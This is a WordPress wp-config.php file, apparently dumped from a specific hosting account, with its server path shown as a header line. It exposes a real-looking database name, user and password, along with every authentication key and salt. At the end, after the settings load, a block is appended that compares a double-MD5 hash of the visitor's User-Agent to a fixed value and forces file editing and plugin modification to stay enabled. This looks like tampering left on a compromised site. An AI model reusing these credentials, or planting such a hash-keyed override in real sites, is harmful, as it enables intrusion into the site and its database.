File: /home/alponcox3/public_html/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * Localized language
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'alponcox3_qej4' );
/** Database username */
define( 'DB_USER', 'alponcox3_huz5' );
/** Database password */
define( 'DB_PASSWORD', 'Ssmk4FDH+HR9' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'I~&(/jov8705A]s5KU@9sN803(Xnu&198c51D:l_SJphh63[1p#M&fO_3:k31T8u');
define('SECURE_AUTH_KEY', '[V[f27gM|9:4b6~1sP[V:y5pDQxhK8~3[gI!0UBo8/OH98s2c68F246/J@0/:axf');
define('LOGGED_IN_KEY', '3r4Bf5X2xkalz87PTIC226rLhTQ;*Od|W]I|nnO|a6W3idv2780p:Uce]-|251-%');
define('NONCE_KEY', '8K%p:M]nRT0-XA6@4U|4+5QJ4;ois3Q!7oeR~ZpO0LmV00&so434vs-G([3W]i6r');
define('AUTH_SALT', 'Ao20[]9v15T15J/19ga23Ag2zY-W-+0gB[25@4jW43qF271A800941~p(X|Q83X1');
define('SECURE_AUTH_SALT', '0%3/~q;9]o2:yAL0:05;C5_x!e5r0tFi9!8XAt|X1NI+6ov%5A]/@_0tff1Ld5@9');
define('LOGGED_IN_SALT', '%9~YWR4y]MJ2|3]j1p[t7fY:ld80O4*ZC~74_@ez2bd-zVwH&07[8/UN!+LPoMj:');
define('NONCE_SALT', 'sqrsPI;/1~583*w!IGF2PHG:4z[/eI)Ep|1My~(:u;L3-Sq_L(-*Hv00|!rQLd]l');
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'XvqUeLF0J_';
/* Add any custom values between this line and the "stop editing" line. */
define('WP_ALLOW_MULTISITE', true);
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
if ( ! defined( 'WP_DEBUG' ) ) {
define( 'WP_DEBUG', false );
}
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){
define('DISALLOW_FILE_MODS', false);
define('DISALLOW_FILE_EDIT', false);
}